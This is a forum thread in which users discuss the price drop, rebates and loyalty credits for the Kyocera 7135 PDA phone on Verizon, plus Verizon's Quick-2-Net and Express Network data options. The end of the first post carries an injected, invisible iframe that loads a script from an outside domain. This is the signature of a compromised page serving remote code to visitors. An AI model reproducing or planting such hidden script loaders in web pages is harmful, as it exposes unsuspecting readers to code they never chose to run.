+ Reply to Thread

when will this phone be cheaper?

I am looking into buying this phone. I want to get a PDA Phone for Verizon because sprint service sucks. My question is, when will this phone be cheap like the deals you see on Amazon now ($150 for the handspring treo 300,$200 for the 270)? When will it be available somwhere else besides Kyocera direct or a Verizon store? Also, does anyone know how Verizon's wireless web works? I know sprint's is ok and relatively cheap. Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I love it! I got to play with 1X for a while as well, and it was as fast as a cable modem, and almost as fast as my DSL connection at home. But the standard connection, though rated at only 14.4 must do some really neat caching, because I have had msn messenger running on the phone, and was able to reply to an email at the same time, with no noticeable lag at all

Re: when will this phone be cheaper?

Originally posted by "ruvitz"

I am looking into buying this phone. I want to get a PDA Phone for Verizon because sprint service sucks. My question is, when will this phone be cheap like the deals you see on Amazon now ($150 for the handspring treo 300,$200 for the 270)? When will it be available somwhere else besides Kyocera direct or a Verizon store?
    Please keep in mind that this phone was only very recently released by Verizon and as such it will be quite some time before its price comes down or before you start to see availability at other retail outlets. Just remember that the Treo 300 was madae available in August/September 2002 and is now only starting to become heavily discounted. If it wasn't for other/newer smartphones being released, you probably wouldn't being seeing such a huge discount. Since the 7135 is very new and it offers advantages over the yet-to-be-released Samsung I500 like a SD slot and mp3 player, do not expect 7135 prices to fall even when the I500 is released despite the I500's smaller size.

However, you may want to check with your place of work to see if they have a contract or rep with Verizon. I opened an individial account through my work's govt rep and was able to get the 7135 for $460 with a 1yr contract as well as 17% off whatever voice plan I chose.

Originally posted by "ruvitz"

Also, does anyone know how Verizon's wireless web works? I know sprint's is ok and relatively cheap. Thanks!
    Verizon has two flavors of internet access. One is called Quick-2-Net and costs approximately an extra $5/month. The speed is 14.4kbps and I believe everytime you connect, the time you spend surfing is deducted from your minutes (not sure though, will have to check on that).

Verizon's second option is their 1xRTT network called Express Network (EN). It is capable of speeds of up to 144kbps although 40-60kbps is more likely what you will experience. Verizon recently released a new unlimited EN plan only for smartphones like the 7135 for an extra $45/month. It gives you unlimited use of EN without it deducting from your minutes. Verizon also has other ways of billing for EN useage such as ones that charge by the amount of data you use as well as ones where you get a bucket of minutes that is good for both voice and data. Check out their website (www.verizonwireless.com) for further details.

Verizon has two flavors of internet access. One is called Quick-2-Net and costs approximately an extra $5/month. The speed is 14.4kbps and I believe everytime you connect, the time you spend surfing is deducted from your minutes (not sure though, will have to check on that).
    I recently found out that with Verizon the Quick-2-Net access is included in any minute-based plan. I originally was under the same impression that the $4.95/mo charge for the "mobile web" is for internet access but it is primarily for non-pda phones with no 'real' browser.

I discovered this information when I called Verizon "Data" tech support because I could not connect (the phone was set to Express Network and I did not subscribe for EN). The rep notified me that with Q2N connections that internet is included in the plan without an additional fee and they removed the charge from my service. I am still able to connect to the internet with no problem.

Originally posted by "Marty"

Please keep in mind that this phone was only very recently released by Verizon and as such it will be quite some time before its price comes down or before you start to see availability at other retail outlets.
    12 days. The 7135 went on $100 rebate on May 25th. Two year plan, $399. Granted, that's not $200, but it's also not $499.
    -s

Originally posted by "Sleeve"

Quote Originally Posted by Marty
    Please keep in mind that this phone was only very recently released by Verizon and as such it will be quite some time before its price comes down or before you start to see availability at other retail outlets.
    12 days. The 7135 went on $100 rebate on May 25th. Two year plan, $399. Granted, that's not $200, but it's also not $499.
    Actually, the 7135 went on sale through Verizon on April 28th (29 days between then and May 25th). The 7135 was on sale through Verizon's business channels on April 1st and through GetConnected.com on January 15th. While I certainly didn't expect to see the 7135 have a rebate associated with it this soon, I am glad since it will hopefully cause more people to consider purchasing this great device. Furthermore, if you are a current Verizon customer enrolled in the New Every 2 program and your two years are up, you can discount another $100 from the price of the phone bringing it down to $299 with a 2yr contact.

Sorry about the "12 days" quip without an explanation. The price change was 12 days from the date of your post I quoted.

$299 is a very compelling case, and I posted my thoughts on it here. I want to be clear for anyone who jumps over, I'm not trying to start a contest, I think both phones are great. I'd also like to know if the facts I dug up are wrong since I'm working on an objective comparison for the two phones. I've been a very happy 6035 owner for two years, but my very specific needs call for a change.
    -s

Originally posted by "Sleeve"

Sorry about the "12 days" quip without an explanation. The price change was 12 days from the date of your post I quoted.
    Yes, I know. No problem. However, since the date you referenced really had no significance as it was just some random day I posted on, I felt it could give a somewhat misleading impression to other users that the $100 rebate was offered 12 days after the 7135 was released and thus why I clarified it in my previous post.

Rebate ends June 11th...

Anyone know if you can combine the "New in 2" $100 credit from Verizon and the rebate? Would bring the phone to $299 if it's allowed...

And why'd they pick June 11th?

Editor and Site Administrator Convergent's Avatar
    You should be able to... the new in 2 is a benefit for customer loyalty. So, they'd be foolish to restrict it to non-rebate and promotional items.
    Mike - Been Converged?

Re: Rebate ends June 11th...

Originally posted by "Walcwlr"

Anyone know if you can combine the "New in 2" $100 credit from Verizon and the rebate? Would bring the phone to $299 if it's allowed...

And why'd they pick June 11th?
    Yes, you can combine the $100 rebate with the NE2 $100 credit. See my post 3 posts above yours.

Oops... See it now. Thanks.

Kyocera $100 rebate...

Is there a rebate coupon? I haven't be able to find it... If someone finds it (if one is needed) please e-mail it to me.

Thanks!

As far as I know, the local verizon store has to give you a little post card. That's how I got mine.

RE: when will the phone be cheaper

In the local Verizon Store the phone has dropped to $399 no rebate. Online it still appears to be $499